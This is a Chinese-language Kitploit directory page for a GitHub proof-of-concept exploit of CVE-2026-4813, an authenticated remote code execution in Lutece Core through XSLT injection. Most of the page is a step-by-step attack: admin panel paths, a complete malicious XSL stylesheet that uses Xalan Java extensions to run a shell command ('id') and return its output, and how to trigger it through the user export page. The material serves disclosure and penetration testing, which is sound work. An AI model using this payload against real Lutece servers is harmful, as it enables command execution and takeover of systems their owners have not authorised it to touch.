Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-4813 — 针对 Lutece Core 中通过 XSLT 注入实现认证远程代码执行的概念验证漏洞利用,演示如何通过精心构造的 XSL 样式表执行命令。 | Kitploit
工具/GitHubGitHub/trachinus/cve-2026-4813
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubtrachinus/cve-2026-4813

CVE-2026-4813

针对 Lutece Core 中通过 XSLT 注入实现认证远程代码执行的概念验证漏洞利用,演示如何通过精心构造的 XSL 样式表执行命令。

查看仓库
1天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-4813(CVSS-B 9.4 严重)

Lutece Core <= 7.1.7 中通过 XSLT 注入实现已认证 RCE

> 更多说明请访问我的网站 <

PoC

您需要一个具有管理员权限的账户。

  1. 在管理面板中,导航至 XSL 导出管理页面: /jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport

  2. 点击“添加新的转换表”。

  3. 上传一个包含载荷(简单的 id 命令)的 .xsl 文件:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
    xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
    xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
    
    <xsl:template match="/">
        <xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
        <xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
        
        <xsl:variable name="reader" select="is:new($inputStream)"/>
        <xsl:variable name="buffereReader" select="br:new($reader)"/>
        <xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
        
        <Output>
            <xsl:value-of select="$resultat"/>
        </Output>
    </xsl:template>
</xsl:stylesheet>
  1. 保存新的 XSL 表。

  2. 导航至导出用户页面: /jsp/admin/user/ExportUsers.jsp

  3. 选择我们刚刚创建的转换表并确认。

  4. id 命令的执行结果应出现在导出的文件中。

下载工具